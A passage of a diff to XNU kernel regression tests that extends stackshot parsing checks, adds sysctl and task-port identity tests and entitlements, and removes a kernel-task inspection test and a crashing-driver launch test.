PARSE_STACKSHOT_DELTA); + bool expect_sharedcache_child = (stackshot_parsing_flags & PARSE_STACKSHOT_SHAREDCACHE_FLAGS); bool expect_zombie_child = (stackshot_parsing_flags & PARSE_STACKSHOT_ZOMBIE); bool expect_postexec_child = (stackshot_parsing_flags & PARSE_STACKSHOT_POSTEXEC); bool expect_cseg_waitinfo = 
(stackshot_parsing_flags & PARSE_STACKSHOT_WAITINFO_CSEG); @@ -1705,9 +1880,13 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD bool found_translated_child = false; bool found_dispatch_queue_label = false, found_turnstile_lock = false; bool found_cseg_waitinfo = false, found_srp_waitinfo = false; - pid_t zombie_child_pid = -1, srp_expected_pid = 0; + bool found_sharedcache_child = false, found_sharedcache_badflags = false, found_sharedcache_self = false; + uint64_t srp_expected_threadid = 0; + pid_t zombie_child_pid = -1, srp_expected_pid = -1, sharedcache_child_pid = -1; pid_t translated_child_pid = -1; + bool sharedcache_child_sameaddr = false; uint64_t postexec_child_unique_pid = 0, cseg_expected_threadid = 0; + uint64_t sharedcache_child_flags = 0, sharedcache_self_flags = 0; char *inflatedBufferBase = NULL; if (expect_shared_cache_uuid) { @@ -1732,6 +1911,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD } } + if (expect_sharedcache_child) { + NSNumber* pid_num = extra[sharedcache_child_pid_key]; + NSNumber* sameaddr_num = extra[sharedcache_child_sameaddr_key]; + T_QUIET; T_ASSERT_NOTNULL(pid_num, "sharedcache child pid provided"); + T_QUIET; T_ASSERT_NOTNULL(sameaddr_num, "sharedcache child addrsame provided"); + sharedcache_child_pid = [pid_num intValue]; + T_QUIET; T_ASSERT_GT(sharedcache_child_pid, 0, "sharedcache child pid greater than zero"); + sharedcache_child_sameaddr = [sameaddr_num intValue]; + T_QUIET; T_ASSERT_GE([sameaddr_num intValue], 0, "sharedcache child sameaddr is boolean (0 or 1)"); + T_QUIET; T_ASSERT_LE([sameaddr_num intValue], 1, "sharedcache child sameaddr is boolean (0 or 1)"); + } if (expect_zombie_child) { NSNumber* pid_num = extra[zombie_child_pid_key]; T_QUIET; T_ASSERT_NOTNULL(pid_num, "zombie child pid provided"); @@ -1749,15 +1939,23 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD if (expect_cseg_waitinfo) { NSNumber* 
tid_num = extra[cseg_expected_threadid_key]; T_QUIET; T_ASSERT_NOTNULL(tid_num, "cseg's expected thread id provided"); - cseg_expected_threadid = [tid_num intValue]; - T_QUIET; T_ASSERT_GT(cseg_expected_threadid, 0, "cseg_expected_threadid greater than zero"); + cseg_expected_threadid = tid_num.unsignedLongValue; + T_QUIET; T_ASSERT_GT(cseg_expected_threadid, UINT64_C(0), "compressor segment thread is present"); } if (expect_srp_waitinfo) { + NSNumber* threadid_num = extra[srp_expected_threadid_key]; NSNumber* pid_num = extra[srp_expected_pid_key]; - T_QUIET; T_ASSERT_NOTNULL(pid_num, "expected SRP pid provided"); - srp_expected_pid = [pid_num intValue]; - T_QUIET; T_ASSERT_GT(srp_expected_pid , 0, "srp_expected_pid greater than zero"); + T_QUIET; T_ASSERT_TRUE(threadid_num != nil || pid_num != nil, "expected SRP threadid or pid"); + if (threadid_num != nil) { + srp_expected_threadid = [threadid_num unsignedLongLongValue]; + T_QUIET; T_ASSERT_GT(srp_expected_threadid, 0ull, "srp_expected_threadid greater than zero"); + } + if (pid_num != nil) { + srp_expected_pid = [pid_num intValue]; + T_QUIET; T_ASSERT_GT(srp_expected_pid, 0, "srp_expected_pid greater than zero"); + } + T_LOG("looking for SRP pid: %d threadid: %llu", srp_expected_pid, srp_expected_threadid); } if (expect_translated_child) { @@ -1766,7 +1964,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD translated_child_pid = [pid_num intValue]; T_QUIET; T_ASSERT_GT(translated_child_pid, 0, "translated child pid greater than zero"); } - + kcdata_iter_t iter = kcdata_iter(ssbuf, sslen); if (delta) { T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_DELTA_STACKSHOT, @@ -1787,7 +1985,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD uint64_t *data; char *desc; for (int i = 0; i < 3; i ++) { - kcdata_iter_get_data_with_desc(iter, &desc, &data, NULL); + kcdata_iter_get_data_with_desc(iter, &desc, (void **)&data, NULL); if (strcmp(desc, 
"kcd_c_type") == 0) { compression_type = *data; } else if (strcmp(desc, "kcd_c_totalout") == 0){ @@ -1799,14 +1997,14 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD iter = kcdata_iter_next(iter); } - T_ASSERT_EQ(compression_type, 1, "zlib compression is used"); - T_ASSERT_GT(totalout, 0, "successfully gathered how long the compressed buffer is"); - T_ASSERT_GT(totalin, 0, "successfully gathered how long the uncompressed buffer will be at least"); + T_ASSERT_EQ(compression_type, UINT64_C(1), "zlib compression is used"); + T_ASSERT_GT(totalout, UINT64_C(0), "successfully gathered how long the compressed buffer is"); + T_ASSERT_GT(totalin, UINT64_C(0), "successfully gathered how long the uncompressed buffer will be at least"); /* progress to the next kcdata item */ T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_STACKSHOT, "compressed stackshot found"); - void *bufferBase = kcdata_iter_payload(iter); + char *bufferBase = kcdata_iter_payload(iter); /* * zlib is used, allocate a buffer based on the metadata, plus @@ -1819,22 +2017,28 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD z_stream zs; memset(&zs, 0, sizeof(zs)); T_QUIET; T_ASSERT_EQ(inflateInit(&zs), Z_OK, "inflateInit OK"); - zs.next_in = bufferBase; - zs.avail_in = totalout; - zs.next_out = inflatedBufferBase; - zs.avail_out = inflatedBufferSize; + zs.next_in = (unsigned char *)bufferBase; + T_QUIET; T_ASSERT_LE(totalout, (uint64_t)UINT_MAX, "stackshot is not too large"); + zs.avail_in = (uInt)totalout; + zs.next_out = (unsigned char *)inflatedBufferBase; + T_QUIET; T_ASSERT_LE(inflatedBufferSize, (size_t)UINT_MAX, "output region is not too large"); + zs.avail_out = (uInt)inflatedBufferSize; T_ASSERT_EQ(inflate(&zs, Z_FINISH), Z_STREAM_END, "inflated buffer"); inflateEnd(&zs); - T_ASSERT_EQ(zs.total_out, totalin, "expected number of bytes inflated"); + T_ASSERT_EQ((uint64_t)zs.total_out, totalin, "expected number of bytes 
inflated"); /* copy the data after the compressed area */ - T_QUIET; T_ASSERT_LE(sslen - totalout - (bufferBase - ssbuf), + T_QUIET; T_ASSERT_GE((void *)bufferBase, ssbuf, + "base of compressed stackshot is after the returned stackshot buffer"); + size_t header_size = (size_t)(bufferBase - (char *)ssbuf); + size_t data_after_compressed_size = sslen - totalout - header_size; + T_QUIET; T_ASSERT_LE(data_after_compressed_size, inflatedBufferSize - zs.total_out, "footer fits in the buffer"); memcpy(inflatedBufferBase + zs.total_out, bufferBase + totalout, - sslen - totalout - (bufferBase - ssbuf)); + data_after_compressed_size); iter = kcdata_iter(inflatedBufferBase, inflatedBufferSize); } @@ -1931,21 +2135,61 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD id uuid = ptr[@"imageUUID"]; uint8_t uuid_p[16]; - for (int i = 0; i < 16; i ++) - uuid_p[i] = (uint8_t) ([[uuid objectAtIndex:i] intValue]); + for (unsigned int i = 0; i < 16; i ++) { + NSNumber *uuidByte = uuid[i]; + uuid_p[i] = (uint8_t)uuidByte.charValue; + } check_shared_cache_uuid(uuid_p); + uint64_t baseAddress = (uint64_t)((NSNumber *)ptr[@"imageSlidBaseAddress"]).longLongValue; + uint64_t firstMapping = (uint64_t)((NSNumber *)ptr[@"sharedCacheSlidFirstMapping"]).longLongValue; + + T_ASSERT_LE(baseAddress, firstMapping, + "in per-task shared_cache_dyld_load_info, " + "baseAddress <= firstMapping"); + T_ASSERT_GE(baseAddress + (1ull << 29), firstMapping, + "in per-task shared_cache_dyld_load_info, " + "baseAddress + 512meg >= firstMapping"); + + size_t shared_cache_len; + const void *addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_ASSERT_EQ((uint64_t)addr, firstMapping, + "SlidFirstMapping should match shared_cache_range"); + /* * check_shared_cache_uuid() will assert on failure, so if * we get here, then we have found the shared cache UUID * and it's correct */ - found_shared_cache_uuid = true; + found_shared_cache_uuid = true; + } + } + if 
(expect_sharedcache_child) { + uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; + uint64_t sharedregion_flags = (task_flags & (kTaskSharedRegionNone | kTaskSharedRegionSystem | kTaskSharedRegionOther)); + id sharedregion_info = container[@"task_snapshots"][@"shared_cache_dyld_load_info"]; + if (!found_sharedcache_badflags) { + T_QUIET; T_ASSERT_NE(sharedregion_flags, 0ll, "one of the kTaskSharedRegion flags should be set on all tasks"); + bool multiple = (sharedregion_flags & (sharedregion_flags - 1)) != 0; + T_QUIET; T_ASSERT_FALSE(multiple, "only one kTaskSharedRegion flag should be set on each task"); + found_sharedcache_badflags = (sharedregion_flags == 0 || multiple); + } + if (pid == 0) { + T_ASSERT_EQ(sharedregion_flags, (uint64_t)kTaskSharedRegionNone, "Kernel proc (pid 0) should have no shared region"); + } else if (pid == sharedcache_child_pid) { + found_sharedcache_child = true; + sharedcache_child_flags = sharedregion_flags; + } else if (pid == getpid()) { + found_sharedcache_self = true; + sharedcache_self_flags = sharedregion_flags; + } + if (sharedregion_flags == kTaskSharedRegionOther && !(task_flags & kTaskSharedRegionInfoUnavailable)) { + T_QUIET; T_ASSERT_NOTNULL(sharedregion_info, "kTaskSharedRegionOther should have a shared_cache_dyld_load_info struct"); + } else { + T_QUIET; T_ASSERT_NULL(sharedregion_info, "expect no shared_cache_dyld_load_info struct"); } } - - if (expect_zombie_child && (pid == zombie_child_pid)) { found_zombie_child = true; @@ -1959,7 +2203,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD found_translated_child = true; uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; - T_ASSERT_EQ((task_flags & kTaskIsTranslated), kTaskIsTranslated, "child marked as translated"); + T_EXPECT_BITS_SET(task_flags, kTaskIsTranslated, "child marked as translated"); continue; } @@ -1968,7 +2212,10 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void 
*ssbuf, size_t sslen, NSD NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"]; for (id i in winfos) { - if ([i[@"wait_type"] intValue] == kThreadWaitCompressor && [i[@"owner"] intValue] == cseg_expected_threadid) { + NSNumber *waitType = i[@"wait_type"]; + NSNumber *owner = i[@"owner"]; + if (waitType.intValue == kThreadWaitCompressor && + owner.unsignedLongValue == cseg_expected_threadid) { found_cseg_waitinfo = true; break; } @@ -1978,16 +2225,27 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD if (expect_srp_waitinfo) { NSArray *tinfos = container[@"task_snapshots"][@"thread_turnstileinfo"]; NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"]; - for (id i in tinfos) { if (!found_srp_waitinfo) { - if ([i[@"turnstile_context"] intValue] == srp_expected_pid && - ([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK)) { - - /* we found something that is blocking the correct pid */ + bool found_thread = false; + bool found_pid = false; + if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_THREAD) && + [i[@"turnstile_context"] unsignedLongLongValue] == srp_expected_threadid && + srp_expected_threadid != 0) { + found_thread = true; + } + if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK) && + [i[@"turnstile_context"] intValue] == srp_expected_pid && + srp_expected_pid != -1) { + found_pid = true; + } + if (found_pid || found_thread) { + T_LOG("found SRP %s %lld waiter: %d", (found_thread ? 
"thread" : "pid"), + [i[@"turnstile_context"] unsignedLongLongValue], [i[@"waiter"] intValue]); + /* we found something that is blocking the correct threadid */ for (id j in winfos) { if ([j[@"waiter"] intValue] == [i[@"waiter"] intValue] && - [j[@"wait_type"] intValue] == kThreadWaitPortReceive) { + [j[@"wait_type"] intValue] == kThreadWaitPortReceive) { found_srp_waitinfo = true; break; } @@ -2010,8 +2268,8 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD "current process name matches in stackshot"); uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; - T_ASSERT_NE((task_flags & kTerminatedSnapshot), kTerminatedSnapshot, "current process not marked as terminated"); - T_ASSERT_NE((task_flags & kTaskIsTranslated), kTaskIsTranslated, "current process not marked as translated"); + T_ASSERT_BITS_NOTSET(task_flags, kTerminatedSnapshot, "current process not marked as terminated"); + T_ASSERT_BITS_NOTSET(task_flags, kTaskIsTranslated, "current process not marked as translated"); T_QUIET; T_EXPECT_LE(pid, [task_snapshot[@"ts_unique_pid"] intValue], @@ -2032,6 +2290,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD bool found_main_thread = false; uint64_t main_thread_id = -1ULL; + bool found_null_kernel_frame = false; for (id thread_key in container[@"task_snapshots"][@"thread_snapshots"]) { NSMutableDictionary *thread = container[@"task_snapshots"][@"thread_snapshots"][thread_key]; NSDictionary *thread_snap = thread[@"thread_snapshot"]; @@ -2057,8 +2316,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD [cpu_times[@"user_time"] intValue], "runnable time of current thread is valid"); } + if (!found_null_kernel_frame) { + for (NSNumber *frame in thread[@"kernel_frames"]) { + if (frame.unsignedLongValue == 0) { + found_null_kernel_frame = true; + break; + } + } + } } T_EXPECT_TRUE(found_main_thread, "found main thread for current task in 
stackshot"); + T_EXPECT_FALSE(found_null_kernel_frame, "should not see any NULL kernel frames"); if (expect_turnstile_lock && !found_turnstile_lock) { NSArray *tsinfos = container[@"task_snapshots"][@"thread_turnstileinfo"]; @@ -2073,10 +2341,22 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD break; } case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: { - struct dyld_uuid_info_64_v2 *payload = kcdata_iter_payload(iter); - T_ASSERT_EQ(kcdata_iter_size(iter), sizeof(*payload), "valid dyld_uuid_info_64_v2 struct"); + struct dyld_shared_cache_loadinfo *payload = kcdata_iter_payload(iter); + T_ASSERT_EQ((size_t)kcdata_iter_size(iter), sizeof(*payload), "valid dyld_shared_cache_loadinfo struct"); + + check_shared_cache_uuid(payload->sharedCacheUUID); + + T_ASSERT_LE(payload->sharedCacheUnreliableSlidBaseAddress, + payload->sharedCacheSlidFirstMapping, + "SlidBaseAddress <= SlidFirstMapping"); + T_ASSERT_GE(payload->sharedCacheUnreliableSlidBaseAddress + (1ull << 29), + payload->sharedCacheSlidFirstMapping, + "SlidFirstMapping should be within 512megs of SlidBaseAddress"); - check_shared_cache_uuid(payload->imageUUID); + size_t shared_cache_len; + const void *addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_ASSERT_EQ((uint64_t)addr, payload->sharedCacheSlidFirstMapping, + "SlidFirstMapping should match shared_cache_range"); /* * check_shared_cache_uuid() asserts on failure, so we must have @@ -2088,6 +2368,19 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD } } + if (expect_sharedcache_child) { + T_QUIET; T_ASSERT_TRUE(found_sharedcache_child, "found sharedcache child in kcdata"); + T_QUIET; T_ASSERT_TRUE(found_sharedcache_self, "found self in kcdata"); + if (found_sharedcache_child && found_sharedcache_self) { + T_QUIET; T_ASSERT_NE(sharedcache_child_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache child should have shared region"); + T_QUIET; T_ASSERT_NE(sharedcache_self_flags, 
(uint64_t)kTaskSharedRegionNone, "sharedcache: self should have shared region"); + if (sharedcache_self_flags == kTaskSharedRegionSystem && !sharedcache_child_sameaddr) { + /* If we're in the system shared region, and the child has a different address, child must have an Other shared region */ + T_ASSERT_EQ(sharedcache_child_flags, (uint64_t)kTaskSharedRegionOther, + "sharedcache child should have Other shared region"); + } + } + } if (expect_zombie_child) { T_QUIET; T_ASSERT_TRUE(found_zombie_child, "found zombie child in kcdata"); } diff --git a/tests/sysctl_get_owned_vmobjects.c b/tests/sysctl_get_owned_vmobjects.c index cedc9f7ec..c8f26eb5a 100644 --- a/tests/sysctl_get_owned_vmobjects.c +++ b/tests/sysctl_get_owned_vmobjects.c @@ -89,7 +89,18 @@ main_test(void) T_EXPECT_EQ(out_buffer->entries, 1ULL, "should have 1 vm object\n"); T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n"); - /* get the list for the current process */ + /* get the list for the current process with an overly large size */ + out_size = SIZE_MAX; + memset(out_buffer, 0, output_size); + ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name)); + + T_QUIET; + T_EXPECT_EQ(ret, 0, "sysctlbyname failed\n"); + T_EXPECT_EQ(out_size, 2 * sizeof(vm_object_query_data_t) + sizeof(int64_t), "sysctl return size is incorrect\n"); + T_EXPECT_EQ(out_buffer->entries, 2ULL, "should have 2 vm objects\n"); + T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n"); + + /* get the list for the current process with the correct output size */ out_size = output_size; memset(out_buffer, 0, output_size); ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name)); diff --git a/tests/sysctl_hw.c b/tests/sysctl_hw.c index 823e1123f..de9329a37 100644 --- a/tests/sysctl_hw.c +++ b/tests/sysctl_hw.c @@ -5,6 +5,8 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist") { char 
buffer[64] = ""; size_t buffer_size = sizeof(buffer); + int v; + size_t v_size; int ret = sysctlbyname("hw.target", buffer, &buffer_size, NULL, 0); @@ -25,4 +27,15 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist") T_ASSERT_POSIX_SUCCESS(ret, "machdep.cpu.brand_string sysctl"); T_LOG("machdep.cpu.brand_string = %s", buffer); + + v = 0; + v_size = sizeof(v); + ret = sysctlbyname("hw.cpu64bit_capable", &v, &v_size, NULL, 0); + T_ASSERT_POSIX_SUCCESS(ret, "hw.cpu64bit_capable"); + +#if __arm__ + T_EXPECT_EQ(v, 0, "cpu is not 64 bit capable"); +#else + T_EXPECT_EQ(v, 1, "cpu is 64 bit capable"); +#endif } diff --git a/tests/task_for_pid_entitlement.plist b/tests/task_for_pid_entitlement.plist index 2398d67f5..da1e64ce3 100644 --- a/tests/task_for_pid_entitlement.plist +++ b/tests/task_for_pid_entitlement.plist @@ -6,5 +6,13 @@ task_for_pid-allow + + com.apple.system-task-ports.control + + + + com.apple.security.get-movable-control-port + + diff --git a/tests/task_ident_test.c b/tests/task_ident_test.c new file mode 100644 index 000000000..8fab0e90a --- /dev/null +++ b/tests/task_ident_test.c @@ -0,0 +1,62 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +T_DECL(task_ident, "test task identity token") +{ + kern_return_t kr; + task_id_token_t token; + mach_port_t port1, port2; + + kr = task_create_identity_token(mach_task_self(), &token); + T_ASSERT_MACH_SUCCESS(kr, "task_create_identity_token()"); + + port1 = mach_task_self(); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_CONTROL, &port2); /* Immovable control port for self */ + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - CONTROL"); + T_EXPECT_EQ(port1, port2, "Control port does not match!"); + + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - READ"); + kr 
= task_identity_token_get_task_port(token, TASK_FLAVOR_READ, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - read"); + T_EXPECT_EQ(port1, port2, "Read port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - INSPECT"); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_INSPECT, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - inspect"); + T_EXPECT_EQ(port1, port2, "Inspect port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_NAME_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - NAME"); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_NAME, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - name"); + T_EXPECT_EQ(port1, port2, "Name port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_identity_token_get_task_port(mach_thread_self(), TASK_FLAVOR_NAME, &port2); + T_EXPECT_NE(kr, KERN_SUCCESS, "task_identity_token_get_task_port() should fail on non-token port"); + + mach_port_deallocate(mach_task_self(), token); +} diff --git a/tests/task_info.c b/tests/task_info.c index a40a5d569..f887beee6 100644 --- a/tests/task_info.c +++ b/tests/task_info.c @@ -13,6 +13,8 @@ #include #include +#include "test_utils.h" + T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true)); /* ************************************************************************************* @@ -51,7 +53,6 @@ void test_task_basic_info_32(void); void test_task_basic_info_64(void); void task_basic_info_32_debug(void); void task_basic2_info_32_warmup(void); -static int is_development_kernel(void); void 
test_task_basic_info(enum info_kind kind); uint64_t info_get(enum info_kind kind, enum info_get get, void * data); @@ -1144,28 +1145,3 @@ info_get(enum info_kind kind, enum info_get get, void * data) __builtin_unreachable(); } - -/* - * Determines whether we're running on a development kernel - */ -static int -is_development_kernel(void) -{ -#define NOTSET -1 - - static int is_dev = NOTSET; - - if (is_dev == NOTSET) { - int dev; - size_t dev_size = sizeof(dev); - - T_QUIET; - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, &dev_size, NULL, 0), NULL); - is_dev = (dev != 0); - - return is_dev; - } else { - return is_dev; - } -#undef NOTSET -} diff --git a/tests/task_inspect.c b/tests/task_inspect.c deleted file mode 100644 index b9fbe2ee7..000000000 --- a/tests/task_inspect.c +++ /dev/null @@ -1,146 +0,0 @@ -#ifdef T_NAMESPACE -#undef T_NAMESPACE -#endif - -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"), - T_META_RUN_CONCURRENTLY(true)); - -/* - * Attempt to inspect kernel_task using a task_inspect_t. Interact with the - * kernel in the same way top(1) and lsmp(1) do. 
- */ - -static void -check_secure_kernel(void) -{ - int secure_kern = 0; - size_t secure_kern_size = sizeof(secure_kern); - - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern, - &secure_kern_size, NULL, 0), NULL); - - if (secure_kern) { - T_SKIP("secure kernel: processor_set_tasks will not return kernel_task"); - } -} - -static void -attempt_kernel_inspection(task_t task) -{ - pid_t pid = (pid_t)-1; - mach_msg_type_number_t i, count, thcnt; - struct task_basic_info_64 ti; - thread_act_array_t threads; - - T_QUIET; - T_EXPECT_MACH_SUCCESS(pid_for_task(task, &pid), NULL); - T_LOG("Checking pid %d", pid); - - if (pid != 0) { - return; - } - - T_LOG("found kernel_task, attempting to inspect"); - - count = TASK_BASIC_INFO_64_COUNT; - T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti, - &count), "task_info(... TASK_BASIC_INFO_64 ...)"); - - T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads"); - T_LOG("Found %d kernel threads.", thcnt); - for (i = 0; i < thcnt; i++) { - kern_return_t kr; - thread_basic_info_data_t basic_info; - mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT; - - kr = thread_info(threads[i], THREAD_BASIC_INFO, - (thread_info_t)&basic_info, &bi_count); - /* - * Ignore threads that have gone away. - */ - if (kr == MACH_SEND_INVALID_DEST) { - T_LOG("ignoring thread that has been destroyed"); - continue; - } - T_EXPECT_MACH_SUCCESS(kr, "thread_info(... 
THREAD_BASIC_INFO ...)"); - (void)mach_port_deallocate(mach_task_self(), threads[i]); - } - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)threads, - thcnt * sizeof(*threads)); - - ipc_info_space_basic_t basic_info; - T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info"); - - ipc_info_space_t info_space; - ipc_info_name_array_t table; - ipc_info_tree_name_array_t tree; - mach_msg_type_number_t tblcnt = 0, treecnt = 0; - T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table, - &tblcnt, &tree, &treecnt), "mach_port_space_info"); - if (tblcnt > 0) { - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)table, - tblcnt * sizeof(*table)); - } - if (treecnt > 0) { - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)tree, - treecnt * sizeof(*tree)); - } - - T_END; -} - -T_DECL(inspect_kernel_task, - "ensure that kernel task can be inspected", - T_META_CHECK_LEAKS(false), - T_META_ASROOT(true)) -{ - processor_set_name_array_t psets; - processor_set_t pset; - task_array_t tasks; - mach_msg_type_number_t i, j, tcnt, pcnt = 0; - mach_port_t self = mach_host_self(); - - check_secure_kernel(); - - T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt), - NULL); - - for (i = 0; i < pcnt; i++) { - T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL); - T_LOG("Checking pset %d/%d", i, pcnt - 1); - - tcnt = 0; - T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL); - - for (j = 0; j < tcnt; j++) { - attempt_kernel_inspection(tasks[j]); - mach_port_deallocate(self, tasks[j]); - } - - /* free tasks array */ - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)tasks, - tcnt * sizeof(*tasks)); - mach_port_deallocate(mach_task_self(), pset); - mach_port_deallocate(mach_task_self(), psets[i]); - } - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)psets, - pcnt * sizeof(*psets)); - - 
T_FAIL("could not find kernel_task in list of tasks returned"); -} diff --git a/tests/task_inspect.entitlements b/tests/task_inspect.entitlements deleted file mode 100644 index eaaf1dedb..000000000 --- a/tests/task_inspect.entitlements +++ /dev/null @@ -1,10 +0,0 @@ - - - - - com.apple.system-task-ports - - task_for_pid-allow - - - diff --git a/tests/task_is_self.c b/tests/task_is_self.c new file mode 100644 index 000000000..9882c467f --- /dev/null +++ b/tests/task_is_self.c @@ -0,0 +1,25 @@ +#include +#include +#include +#include + +T_DECL(mach_task_is_self, + "test task port comparison check") +{ + mach_port_t self_insp, self_read, self_name, port; + + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_READ_PORT, &self_read), "task_get_special_port failed"); + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &self_insp), "task_get_special_port failed"); + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_NAME_PORT, &self_name), "task_get_special_port failed"); + + T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate failed"); + + T_EXPECT_NE(self_read, self_insp, "read and inspect port should be different"); + T_EXPECT_NE(self_read, mach_task_self(), "read and control port should be different"); + + T_EXPECT_EQ(1, mach_task_is_self(mach_task_self()), "control port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_read), "read port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_insp), "inspect port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_name), "name port should point to self"); + T_EXPECT_NE(1, mach_task_is_self(port), "_port_ should not point to self"); +} diff --git a/tests/test_dext_launch_56101852.c b/tests/test_dext_launch_56101852.c deleted file mode 100644 index 99ad78213..000000000 --- a/tests/test_dext_launch_56101852.c +++ /dev/null @@ -1,101 +0,0 @@ -#include -#include 
-#include -#include -#include -#include -#include - -T_GLOBAL_META(T_META_NAMESPACE("xnu.iokit"), - T_META_RUN_CONCURRENTLY(true)); - -#define DEXT_NAME "com.apple.test_intentionally_crashing_driver_56101852.dext" -#define DEXT_PATH "/Library/DriverExtensions/" DEXT_NAME -#define SYSCTL_NAME "kern.driverkit_checkin_timed_out" -#define MAX_TIMEOUT_SECONDS 120 - -static int -copyfileCallback(int what __unused, int stage, copyfile_state_t state __unused, const char *src __unused, const char *dst, void *ctx __unused) -{ - if (stage == COPYFILE_FINISH) { - T_QUIET; T_ASSERT_POSIX_SUCCESS(chown(dst, 0, 0), "chown %s to root / wheel", dst); - } - return COPYFILE_CONTINUE; -} - -static void -cleanup(void) -{ - removefile_state_t state = removefile_state_alloc(); - removefile(DEXT_PATH, state, REMOVEFILE_RECURSIVE); - removefile_state_free(state); -} - -T_DECL(test_dext_launch_56101852, - "Test launching a crashing dext", - T_META_ASROOT(true), 